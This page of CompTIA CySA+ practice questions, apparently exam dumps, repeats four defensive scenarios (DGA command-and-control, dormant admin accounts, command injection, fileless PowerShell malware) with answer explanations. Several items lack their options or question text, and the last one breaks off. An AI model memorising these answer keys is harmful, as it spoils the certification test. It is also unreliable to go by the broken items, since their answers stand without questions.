CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 5 Q 81-100

Practice Exams:

View All

CompTIA

CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 5 Q 81-100

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 81

A SOC analyst identifies that multiple endpoints are communicating with an external IP address over an uncommon port, and these connections coincide with high volumes of DNS requests to seemingly random domains. Which of the following BEST describes the type of threat observed?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The indicators described in this scenario—uncommon outbound ports, multiple endpoints connecting to a single external IP, and frequent DNS queries for randomized domains—are classic signs of malware using a domain generation algorithm for command-and-control communication. DGAs are a sophisticated technique used by attackers to evade detection and maintain persistent communication with compromised hosts. They allow malware to generate large sets of pseudo-random domain names that change over time, which makes static blocking using IP or domain blacklists largely ineffective.

From a defensive perspective, monitoring these anomalies is critical. Security analysts can detect DGA-based malware by analyzing DNS query patterns, including the volume of requests, unusual subdomain structures, and high-frequency queries to domains that do not resolve or are unfamiliar. Additionally, combining DNS traffic analysis with endpoint telemetry, network flow data, and intrusion detection system (IDS) alerts can help identify infected hosts more accurately. Mitigation requires isolating the affected endpoints, blocking malicious domains or IP addresses, and performing malware remediation, such as memory and disk forensics to remove any persistent components.

DGA-based malware often leverages legitimate tools and protocols, meaning it may not trigger signature-based antivirus solutions. This emphasizes the importance of behavior-based detection, anomaly monitoring, and layered security controls. Implementing a defense-in-depth strategy—including endpoint detection and response (EDR), network segmentation, and strict outbound traffic rules—can limit the impact and prevent further propagation. Once identified, reverse engineering the DGA can allow security teams to preemptively block future domain communications, effectively mitigating ongoing threats.

B Standard software update traffic

Legitimate software updates contact known servers at predictable intervals, use standard ports, and do not involve randomized DNS queries. The volume and randomness of the observed activity is inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

A DDoS attack generates high-volume traffic targeting specific services to disrupt availability. In contrast, this scenario reflects covert communication and command-and-control behavior rather than service disruption.

D Misconfigured internal monitoring system

While misconfigurations can produce unusual traffic patterns, the combination of external communication, randomized DNS queries, and uncommon ports points strongly to malicious activity rather than benign misconfigurations.

Question 82

During an internal audit, a security analyst discovers that several privileged service accounts have not been used in more than six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access to privileged accounts
D) Deploy full disk encryption on all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive administrative accounts are a high-value target for attackers. Even if unused, these accounts often retain elevated privileges that can be exploited if credentials are stolen, guessed, or obtained through lateral movement. Automated account deprovisioning addresses this risk by disabling or removing accounts after a defined period of inactivity, enforcing the principle of least privilege. By integrating automated account management into identity governance frameworks, organizations can ensure that security policies are applied consistently and efficiently, reducing human error and preventing orphaned or forgotten accounts from becoming an attack vector.

Automation also facilitates continuous compliance with regulatory frameworks, such as HIPAA, PCI DSS, and GDPR, which require organizations to manage user access actively. For example, logging and auditing account deprovisioning actions provides accountability and allows verification of compliance during external audits. Automated deprovisioning also integrates well with other security tools, such as PAM solutions, which manage and control access to critical resources, adding another layer of protection for high-value accounts.

Beyond deprovisioning, additional preventive measures, such as implementing MFA, restricting login attempts, monitoring account usage, and requiring periodic access reviews, enhance security posture. Organizations can also correlate account inactivity with endpoint telemetry to ensure that dormant accounts are not being leveraged in attempts to establish persistence or perform lateral movement. Ultimately, automated account deprovisioning reduces risk while maintaining operational efficiency, as it removes the need for manual account reviews, which can be time-consuming and prone to oversight.

B Increase password complexity requirements for service accounts

Password complexity does not address the core issue of dormant accounts with elevated privileges. Even strong passwords provide no protection if attackers gain access to unused accounts through internal compromise.

C Disable all external SSH access to privileged accounts

Restricting SSH access limits some attack vectors but does not prevent exploitation via local or lateral access methods.

D Deploy full disk encryption on all endpoints

Full disk encryption protects data at rest but does not mitigate the risks posed by unused administrative accounts.

Question 83

A web application is found to be vulnerable to OS-level command execution through unsanitized input fields. Which of the following is the MOST effective control to prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values for web applications
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

OS command injection vulnerabilities occur when user-supplied input is improperly processed by the application and executed as system-level commands. Server-side input validation is essential to mitigate this risk. By validating input against expected formats, lengths, and types, malicious input is rejected before it can reach the underlying operating system. Parameterized commands, prepared statements, and secure APIs separate user input from executable code, preventing attackers from injecting commands into the system.

Implementing secure coding practices is critical to preventing command injection. Developers should follow application security frameworks and coding standards that emphasize input sanitization, secure function usage, and output encoding. Regular code reviews, static application security testing (SAST), and dynamic application security testing (DAST) can detect injection vulnerabilities early in the development lifecycle. Additionally, web application firewalls (WAFs) can provide an additional layer of protection by inspecting input for known patterns of malicious activity.

Logging and monitoring input validation failures can help detect attempts at exploitation, providing early warning signs to SOC teams. This allows security teams to proactively investigate attacks, mitigate vulnerabilities, and prevent the execution of malicious commands. The implementation of these controls protects sensitive data, preserves system integrity, and reduces the risk of unauthorized access or escalation to higher privileges.

B Enforce TLS encryption for all web traffic

TLS encrypts data in transit, ensuring confidentiality and integrity, but does not mitigate application-layer command injection attacks.

C Increase session timeout values for web applications

Adjusting session timeouts protects against session hijacking but does not prevent command injection.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect the application layer for malicious input and cannot prevent OS-level command execution.

Question 84

A SOC analyst identifies that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?

A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

Privileged Access Management with JIT access is a proactive approach to securing high-privilege accounts. It grants administrative access only when necessary and for a defined duration. By limiting persistent access, attackers cannot leverage stolen credentials to establish reverse shells or move laterally across the network. PAM solutions also provide session logging, monitoring, and auditing, enhancing visibility and enabling rapid response to anomalous activity.

JIT access enforces the principle of least privilege, reducing the attack surface associated with high-privilege accounts. When combined with multi-factor authentication (MFA) and strong authentication policies, PAM effectively mitigates risks posed by credential compromise. Integration with identity governance and EDR systems ensures that any unusual activity is detected and alerts are triggered immediately.

Moreover, PAM provides detailed forensic records, which are critical for post-incident investigations. Analysts can track which accounts were used, what commands were executed, and whether any suspicious activity occurred during elevated sessions. By implementing PAM with JIT access, organizations maintain operational efficiency while significantly reducing the risk of compromise.

B Increase password complexity for all accounts

Strong passwords help prevent brute-force attacks but do not mitigate attacks using already stolen credentials.

C Deploy signature-based antivirus on the server

Traditional antivirus may detect known malware but is ineffective against reverse shells established using legitimate administrative tools.

D Disable all remote access capabilities

Disabling remote access entirely may disrupt operational workflows. PAM with JIT provides a controlled and secure alternative.

Question 85

A security analyst detects abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and are communicating with unknown external IP addresses. Antivirus scans do not identify any malicious files. Which of the following BEST describes the threat?

A) Fileless malware using living-off-the-land techniques
B) Standard ransomware encrypting local files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service attack

Answer A

Explanation:

A Fileless malware using living-off-the-land techniques

Fileless malware operates entirely in memory, leveraging legitimate administrative tools, such as PowerShell, WMI, or Office macros, to execute malicious activities. This type of malware avoids writing malicious binaries to disk, making it highly evasive and challenging for traditional antivirus solutions to detect. Indicators include unusual script execution, obfuscated commands, and outbound communication with suspicious IP addresses.

Living-off-the-land attacks utilize native system tools to minimize detection, often executing reconnaissance, lateral movement, or data exfiltration. Detection requires behavior-based monitoring, memory forensics, and endpoint detection and response (EDR) solutions that track anomalous script execution, unusual network traffic, and process behaviors. Isolating affected endpoints, analyzing scripts, and removing malicious processes are critical containment steps. Implementing application whitelisting, least privilege policies, and network segmentation further reduces the effectiveness of fileless malware.

B Standard ransomware encrypting local files

Ransomware typically leaves noticeable signs of file encryption, which is not described in this scenario.

C Phishing emails delivering malicious attachments

Phishing may be a delivery method, but the threat observed here involves post-compromise activity on endpoints.

D Distributed denial-of-service attack

DoS attacks disrupt availability and do not involve obfuscated scripts or external communication patterns as described.

Question 86

A SOC analyst notices multiple endpoints attempting to connect to suspicious external IP addresses using unusual high-numbered ports. DNS logs also show a high number of queries for domains that appear to be randomly generated. Which of the following BEST describes the nature of the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard patch management traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The pattern of multiple endpoints connecting to suspicious external IPs on high-numbered, uncommon ports, coupled with high-frequency DNS requests for seemingly random domains, strongly indicates malware employing a domain generation algorithm (DGA) to maintain command-and-control (C2) channels. DGAs are sophisticated techniques designed to avoid detection and blacklisting. By generating new, pseudo-random domain names periodically, malware ensures that even if some domains are blocked or taken down, it can still connect to operational C2 servers.

Detection of DGA-based malware requires correlation of multiple indicators. Analysts must review DNS query patterns for randomness, unusual lengths, or high entropy values, which differ from normal corporate DNS traffic. Network flow analysis can help identify unusual outbound connections to external IPs, particularly when endpoints that rarely communicate externally suddenly begin sending large amounts of traffic. Endpoint telemetry and behavior analytics are also critical for detecting DGA infections, as they provide context for script execution, process anomalies, and abnormal network connections.

Effective mitigation involves immediate isolation of affected endpoints to prevent further exfiltration and propagation. Blocking the malicious domains at the network perimeter, combined with blacklisting IP addresses identified as C2 servers, can disrupt ongoing attacks. Reverse engineering the DGA algorithm is often necessary to anticipate future domain names and proactively block communications. Fileless techniques are often used in conjunction with DGAs, meaning the malware may reside in memory and leverage legitimate system tools, making behavior-based detection crucial. A defense-in-depth approach, combining endpoint detection, SIEM correlation, network segmentation, and threat intelligence, ensures a resilient response to DGA-based threats.

B Standard patch management traffic

Legitimate patch management typically communicates with known update servers, on standard ports, and does not generate high-frequency randomized DNS queries.

C Distributed denial-of-service (DDoS) attack

DDoS attacks are characterized by overwhelming traffic to disrupt availability, rather than covert communication with C2 servers.

D Misconfigured internal monitoring system

While misconfigurations can generate unusual traffic, the combination of external communication, random domain resolution, and uncommon ports strongly indicates malicious intent.

Question 87

An internal audit reveals several service accounts have not been used for more than six months but still have administrative privileges. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Service accounts that are inactive yet retain elevated privileges represent a high-value attack vector. Attackers can exploit these dormant accounts through credential theft, lateral movement, or brute-force attacks. Automated account deprovisioning ensures accounts are removed or disabled after a defined period of inactivity, enforcing the principle of least privilege and minimizing risk.

Automation reduces human error associated with manual account reviews, ensures consistent application of security policies, and provides an audit trail for compliance purposes. By integrating automated account deprovisioning with identity governance and privileged access management (PAM) systems, organizations can enforce access lifecycle policies, maintain detailed logs, and facilitate rapid remediation if dormant accounts are discovered. Automated deprovisioning also strengthens regulatory compliance with frameworks like HIPAA, PCI DSS, and GDPR, all of which mandate that accounts with privileged access be actively monitored and controlled.

Beyond deprovisioning, other mitigating strategies include monitoring for unauthorized login attempts, enabling multi-factor authentication (MFA) for privileged accounts, and conducting periodic access reviews. Coordination with security operations ensures that any inactive accounts are logged and analyzed for potential misuse, further reducing attack surface exposure. Overall, automated account deprovisioning provides a scalable, consistent, and effective method to mitigate risks associated with dormant administrative accounts.

B Increase password complexity for service accounts

While strong passwords reduce the likelihood of brute-force attacks, they do not address the security risk posed by unused accounts retaining administrative privileges.

C Disable all external SSH access

Restricting external SSH access mitigates remote access attacks but does not prevent abuse of dormant accounts internally or through lateral movement.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not address vulnerabilities related to dormant accounts with administrative privileges.

Question 88

During a penetration test, testers exploit a web application vulnerability allowing OS-level command execution via unsanitized input parameters. Which of the following controls would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

OS command injection occurs when user input is improperly processed and executed by the operating system. Server-side input validation ensures input matches expected types, lengths, and formats, effectively preventing execution of malicious commands. Using parameterized commands or prepared statements separates input from executable code, neutralizing injection attempts.

Secure coding practices, such as input validation, output encoding, and the use of frameworks that enforce proper handling of user input, are essential. Continuous monitoring and logging of input validation failures provide early indicators of attack attempts. Regular code reviews, static application security testing (SAST), and dynamic application security testing (DAST) help identify vulnerabilities before they are exploited in production. Additionally, web application firewalls (WAFs) can provide an extra layer of defense by filtering malicious requests based on known attack patterns.

Implementing these controls reduces the risk of unauthorized command execution, preserves system integrity, protects sensitive data, and ensures regulatory compliance with frameworks such as PCI DSS and OWASP standards. Education and training for developers on secure coding principles are also critical to prevent future vulnerabilities. Overall, server-side validation and parameterization represent a proactive, robust control to prevent OS-level command injection attacks.

B Enforce TLS encryption for all web traffic

TLS protects data in transit but does not mitigate application-layer input vulnerabilities such as command injection.

C Increase session timeout values

Adjusting session timeouts improves security against session hijacking but does not prevent command injection attacks.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect application input or prevent malicious commands from executing within the application layer.

Question 89

A SOC analyst detects that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access is highly effective in preventing attackers from leveraging stolen credentials. JIT access grants administrative privileges only for specific tasks and for a limited duration, reducing the window in which attackers can exploit credentials. PAM systems log and monitor all privileged sessions, providing visibility into suspicious activity and supporting forensic investigations.

The principle of least privilege is reinforced, ensuring that users only have access when necessary and cannot maintain persistent administrative access. Integration with multi-factor authentication (MFA) strengthens access controls and prevents unauthorized sessions. PAM also helps organizations meet regulatory compliance requirements by documenting all privileged access events, providing audit trails for security reviews, and supporting incident response.

Effective implementation of PAM reduces the risk of post-compromise attacks such as reverse shells, lateral movement, and data exfiltration. It also minimizes operational disruption because administrators retain access when necessary, unlike blanket restrictions that could hinder business functions. This proactive approach aligns with modern security best practices, combining prevention, detection, and response in a single control.

B Increase password complexity for all accounts

Strong passwords prevent brute-force attacks but do not prevent exploitation of credentials already stolen.

C Deploy signature-based antivirus on the server

Traditional antivirus may not detect reverse shells established using legitimate tools or memory-resident malware.

D Disable all remote access capabilities

While disabling remote access can prevent exploitation, it is operationally impractical. PAM with JIT access provides secure, controlled access without disrupting legitimate administrative tasks.

Question 90

A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates entirely in memory, leaving no persistent binaries on disk, which makes it difficult for traditional signature-based antivirus solutions to detect. These attacks leverage legitimate administrative tools such as PowerShell, WMI, or macros to execute malicious actions like reconnaissance, lateral movement, privilege escalation, or data exfiltration. Indicators include obfuscated scripts, unusual execution patterns, and communication with unknown external IPs.

Living-off-the-land attacks exploit built-in system utilities, allowing attackers to blend malicious activity with normal administrative operations. Detection requires behavior-based monitoring, memory analysis, and endpoint detection and response (EDR) solutions. Forensic investigation involves capturing memory dumps, analyzing scripts, and correlating network connections to identify compromised hosts. Mitigation includes isolating affected endpoints, removing malicious processes, implementing application whitelisting, enforcing least privilege policies, and using threat intelligence to detect known attack patterns.

B Standard ransomware encrypting files

Ransomware leaves distinct signs of file encryption, which is not observed in this scenario.

C Phishing emails delivering malicious attachments

While phishing could be an initial vector, the scenario involves active fileless malware executing in memory, not just delivery of malicious content.

D Distributed denial-of-service (DDoS) attack

DDoS attacks disrupt availability and do not involve obfuscated scripts or external command-and-control communication.

Question 91

A security analyst identifies that several service accounts have not been used for more than six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable external SSH access
D) Deploy full disk encryption on all endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive accounts with administrative privileges are a high-value target for attackers, as they often go unnoticed while retaining extensive access to critical systems. Automated account deprovisioning mitigates this risk by systematically removing or disabling accounts that have been inactive for a predefined period. This process enforces the principle of least privilege, ensuring that only active users maintain access to sensitive systems, reducing the attack surface significantly.

Integration with identity governance and privileged access management (PAM) systems enhances the effectiveness of automated deprovisioning. These systems maintain centralized control over user lifecycles, providing audit logs, alerting on anomalies, and facilitating compliance with regulatory requirements such as HIPAA, PCI DSS, and GDPR. By automating the deprovisioning process, organizations eliminate reliance on manual account reviews, which are prone to human error, delays, or oversight.

Additionally, automated deprovisioning can be combined with risk-based access reviews, anomaly detection, and multi-factor authentication (MFA) to create a layered defense strategy. When accounts are deprovisioned, organizations reduce the risk of lateral movement, credential theft, and post-compromise attacks. This control also simplifies security operations by enabling proactive management rather than reactive responses after incidents occur. Continuous monitoring ensures dormant accounts do not remain in the environment, and alerting mechanisms can notify administrators if suspicious activity is detected, such as unauthorized attempts to access deprovisioned accounts.

B Increase password complexity for service accounts

While complex passwords reduce the likelihood of brute-force attacks, they do not eliminate the risks associated with dormant accounts that retain elevated privileges. Attackers could still leverage these accounts if credentials were stolen or previously compromised.

C Disable external SSH access

Disabling SSH for external access limits one attack vector but does not address threats originating internally, lateral movement, or misuse of dormant accounts.

D Deploy full disk encryption on all endpoints

Full disk encryption protects data at rest but does not mitigate risks associated with unused privileged accounts or credential misuse.

Question 92

A SOC analyst detects unusual PowerShell execution on multiple endpoints. Scripts are obfuscated and connect to external IP addresses. Antivirus scans do not identify any malicious files. Which of the following BEST describes the type of threat?

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware is designed to reside primarily in memory rather than writing files to disk, making it highly evasive against traditional signature-based antivirus solutions. In this scenario, the obfuscated PowerShell scripts connecting to unknown external IPs indicate that the malware leverages legitimate administrative tools to execute malicious actions. This living-off-the-land (LotL) approach minimizes detection by blending with normal system processes, allowing attackers to conduct reconnaissance, lateral movement, privilege escalation, and data exfiltration without leaving easily identifiable artifacts.

Detection requires advanced behavioral monitoring and endpoint detection and response (EDR) capabilities. Indicators include anomalous script execution, unusual process spawning, unexpected outbound network connections, and deviations from typical user or system behavior. Analysts often combine memory analysis, process monitoring, and network traffic inspection to identify fileless attacks. Mitigation involves isolating infected endpoints, terminating malicious processes, remediating compromised systems, and implementing application whitelisting to prevent unauthorized script execution.

Defensive strategies include enforcing least privilege, disabling unused scripting engines, deploying threat intelligence feeds to identify suspicious domains or IPs, and logging PowerShell activity with module logging, script block logging, and transcription. Employee awareness, network segmentation, and strict access controls further reduce the impact of fileless malware by limiting its ability to propagate laterally. Organizations should also maintain robust incident response procedures, including forensic analysis, containment, and remediation plans specifically designed to handle memory-resident threats.

B Standard ransomware encrypting files

Ransomware typically manifests as immediate file encryption and ransom notes, which is not observed here.

C Phishing emails delivering malicious attachments

While phishing may be an initial infection vector, the active execution of obfuscated scripts in memory suggests the presence of fileless malware rather than just email delivery.

D Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources to degrade service availability and do not involve memory-resident script execution or obfuscated processes.

Question 93

During a penetration test, testers exploit a web application vulnerability that allows OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when malicious input is passed to the underlying operating system without proper sanitization, allowing attackers to execute arbitrary commands. Server-side input validation ensures that all user-supplied input matches expected types, lengths, and formats, effectively blocking malicious payloads. Parameterized commands or prepared statements further separate data from executable code, neutralizing injection attempts.

Secure coding practices, such as input validation, output encoding, and using secure frameworks, are essential to reduce vulnerabilities. Security teams can supplement these measures with web application firewalls (WAFs) to provide an additional layer of protection against common injection attacks. Regular static application security testing (SAST) and dynamic application security testing (DAST) enable early detection of potential vulnerabilities during development and testing phases.

Behavioral monitoring and logging also help identify attempts to exploit input validation weaknesses. Anomalies such as unusual characters, command patterns, or execution timing can indicate ongoing attacks. Proactive remediation, including patching vulnerable code, applying security updates, and conducting periodic security reviews, strengthens the overall application security posture. This multi-layered approach reduces the likelihood of OS-level command execution, protects sensitive data, and supports compliance with standards such as PCI DSS and OWASP Application Security Verification Standards (ASVS).

B Enforce TLS encryption for all web traffic

TLS encrypts data in transit, ensuring confidentiality and integrity, but does not prevent input validation vulnerabilities or command injection attacks.

C Increase session timeout values

Adjusting session timeouts mitigates session hijacking but does not address application-layer injection vulnerabilities.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect or validate application-level input, making them ineffective against OS-level command execution vulnerabilities.

Question 94

A SOC analyst discovers that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

Privileged Access Management (PAM) solutions with JIT access grant administrative privileges only for specific tasks and for limited time windows. This approach minimizes the risk of attackers leveraging stolen credentials to establish reverse shells or perform lateral movement. PAM systems also provide detailed session logging, real-time monitoring, and audit trails, enabling analysts to detect abnormal activity promptly.

JIT access reinforces the principle of least privilege by ensuring that users only receive elevated access when necessary. Combined with multi-factor authentication (MFA), PAM mitigates risks associated with stolen credentials and reduces the attack surface. Integration with EDR and SIEM solutions enables correlation of access events with anomalous network or process activity, enhancing incident detection and response.

Additionally, PAM facilitates compliance with regulatory frameworks, such as SOX, HIPAA, and PCI DSS, by providing auditable records of privileged access. Security teams can use these logs to perform forensic analysis, identify patterns of misuse, and implement proactive controls to prevent future compromise. PAM also reduces operational disruption by allowing controlled access for legitimate administrative tasks without eliminating necessary functionality.

B Increase password complexity for all accounts

While stronger passwords reduce brute-force risk, they do not mitigate attacks using already compromised credentials.

C Deploy signature-based antivirus on the server

Traditional antivirus may detect known malware but cannot prevent reverse shells established via legitimate administrative tools.

D Disable all remote access capabilities

Disabling remote access is operationally impractical and can hinder legitimate administrative functions, whereas PAM with JIT provides a controlled, secure alternative.

Question 95

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and avoids writing executable files to disk, making it highly evasive and difficult to detect using traditional signature-based antivirus solutions. In this scenario, the execution of obfuscated PowerShell scripts and external communication to unknown IP addresses strongly indicates that attackers are leveraging legitimate administrative tools to achieve malicious objectives. This living-off-the-land (LotL) approach allows malware to perform reconnaissance, lateral movement, privilege escalation, and data exfiltration while minimizing forensic evidence.

Detection relies on behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include anomalous command execution, unexpected child processes, unusual outbound connections, and deviations from standard system behavior. Mitigation involves isolating compromised endpoints, terminating malicious processes, analyzing scripts for functionality, and remediating infected hosts.

Preventive strategies include application whitelisting, enforcement of least privilege, restricting PowerShell execution policy, logging and monitoring PowerShell activity, network segmentation, and integrating threat intelligence to detect and block communication with known malicious domains or IP addresses. These measures collectively reduce the attack surface and hinder the ability of attackers to exploit living-off-the-land techniques.

B Standard ransomware encrypting files

Ransomware usually manifests through file encryption and ransom notes, which is inconsistent with memory-resident malicious script execution.

C Phishing emails delivering malicious attachments

While phishing may be an initial infection vector, the active execution of obfuscated scripts demonstrates post-compromise fileless malware behavior.

D Distributed denial-of-service (DDoS) attack

DDoS attacks target service availability and do not involve obfuscated memory-resident scripts or external communication channels as observed here.

Question 96

A SOC analyst detects that multiple endpoints are communicating with external IP addresses over uncommon high-numbered ports. DNS logs show numerous queries to seemingly random domains. Which of the following BEST describes the threat?

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The pattern described—unusual outbound connections on uncommon ports combined with DNS queries to random or high-entropy domains—is characteristic of malware utilizing a domain generation algorithm (DGA). DGAs enable malware to create large numbers of pseudo-random domain names for command-and-control (C2) communications, making it difficult for defenders to block communication via static blacklists. This technique is often used by advanced persistent threat actors to maintain persistence and evade detection by conventional security controls.

Detecting DGA-based malware requires a multi-faceted approach. Analysts monitor DNS query patterns for anomalies such as high entropy, non-existent domains, and irregular query volumes. Network traffic analysis complements DNS monitoring, identifying suspicious outbound connections that deviate from normal patterns, such as uncommon ports or destinations outside typical geographies. Endpoint telemetry is equally critical, as it can reveal the execution of scripts, binaries, or memory-resident malware responsible for initiating these communications.

Mitigation involves isolating affected endpoints, blocking identified malicious domains and IPs, and removing malware from infected hosts. Reverse engineering the DGA can allow proactive blocking of future domain generations, reducing the effectiveness of the malware. Threat intelligence feeds can also help identify known C2 servers and DGA patterns. Furthermore, layered defense strategies—including endpoint detection and response (EDR), network segmentation, anomaly-based intrusion detection, and behavioral monitoring—ensure the organization can detect and respond to sophisticated malware campaigns promptly.

B Standard software update traffic

Legitimate software updates typically communicate with known servers on standard ports and do not generate random DNS queries. The observed behavior indicates a malicious C2 mechanism rather than routine maintenance traffic.

C Distributed denial-of-service (DDoS) attack

DDoS attacks involve overwhelming resources to degrade availability and do not exhibit covert C2 communications or randomized DNS requests.

D Misconfigured internal monitoring system

Misconfigurations can generate anomalous traffic but rarely produce the combination of external communication to uncommon ports and randomized domain queries observed here.

Question 97

An internal audit reveals several privileged service accounts have not been used in over six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive administrative accounts are particularly attractive to attackers because they retain privileges that may be leveraged for lateral movement or persistent access. Automated account deprovisioning removes or disables accounts after a defined period of inactivity, ensuring that only active users retain administrative rights. This approach enforces the principle of least privilege, reducing the potential attack surface.

Integrating deprovisioning with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement and generates audit logs for compliance purposes. These systems can automatically alert administrators to dormant accounts, remove access, and maintain documentation for regulatory reporting, such as PCI DSS, HIPAA, or SOX. By automating this process, organizations reduce human error associated with manual account reviews and ensure that dormant accounts do not linger undetected.

Deprovisioning also mitigates risks from stolen or leaked credentials, preventing attackers from exploiting accounts that are no longer needed. Organizations can complement this control with multi-factor authentication (MFA), anomaly detection, and access monitoring to further strengthen security posture. Continuous monitoring ensures that any unauthorized attempts to reactivate or access deprovisioned accounts are detected promptly. Overall, automated account deprovisioning is a proactive and scalable solution to minimize risks associated with dormant administrative accounts.

B Increase password complexity for service accounts

Strong passwords do not prevent attacks using dormant accounts. Even complex passwords are ineffective if the account remains active and the credentials are compromised.

C Disable all external SSH access

Restricting SSH access only addresses external threats and does not mitigate internal misuse of inactive accounts.

D Deploy full disk encryption on endpoints

While important for data protection, full disk encryption does not address the risk posed by dormant privileged accounts.

Question 98

A web application is discovered to be vulnerable to OS-level command execution through unsanitized input fields. Which of the following controls would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when user input is improperly processed and executed by the operating system. Implementing server-side input validation ensures that all input conforms to expected formats, lengths, and types, preventing malicious commands from being executed. Parameterized commands or prepared statements further enforce a separation between user input and executable code, neutralizing potential injection attempts.

Secure coding practices, including input validation, output encoding, and the use of secure frameworks, are critical to preventing exploitation. Regular static and dynamic application security testing (SAST/DAST) identifies vulnerabilities early in the development lifecycle. Web application firewalls (WAFs) can supplement these measures by filtering malicious requests at the application layer.

Monitoring and logging input validation failures provides early warning of attempted attacks, enabling analysts to investigate and respond proactively. Remediation involves patching vulnerable code, updating libraries, and conducting periodic security reviews to ensure adherence to secure coding standards. This approach protects system integrity, sensitive data, and supports compliance with regulatory frameworks such as PCI DSS and OWASP Application Security Verification Standards (ASVS).

B Enforce TLS encryption for all web traffic

TLS protects data in transit but does not address application-layer input vulnerabilities or command injection attacks.

C Increase session timeout values

Session timeout adjustments protect against session hijacking but are ineffective against command injection vulnerabilities.

D Add additional firewall rules at the perimeter

Firewalls cannot inspect application-layer input or prevent malicious commands from executing, making them ineffective for mitigating command injection.

Question 99

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access ensures that administrative privileges are granted only when required and for limited periods, reducing the window in which attackers can leverage stolen credentials. By limiting persistent access, PAM mitigates the risk of reverse shells and lateral movement attacks. PAM systems also provide detailed session logging, monitoring, and auditing, enabling analysts to detect suspicious behavior and respond promptly.

JIT access reinforces the principle of least privilege by ensuring that elevated privileges are not continuously available. Integration with multi-factor authentication (MFA) and endpoint detection solutions further enhances security. PAM enables organizations to maintain operational efficiency while reducing the risk associated with high-privilege accounts. Detailed logging supports compliance with regulatory frameworks, such as SOX, HIPAA, and PCI DSS, providing auditable records for privileged access.

Mitigation strategies include monitoring for anomalous login patterns, enforcing temporal access restrictions, and combining PAM with threat intelligence to detect suspicious C2 activity. Overall, PAM with JIT is a proactive and highly effective control to prevent post-compromise attacks that exploit privileged accounts.

B Increase password complexity for all accounts

Strong passwords reduce brute-force attack risk but do not mitigate attacks using stolen credentials.

C Deploy signature-based antivirus on the server

Traditional antivirus may detect known malware but cannot prevent reverse shells established via legitimate administrative tools.

D Disable all remote access capabilities

Disabling remote access entirely may hinder legitimate administration, whereas PAM with JIT offers controlled and secure access.

Question 100

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

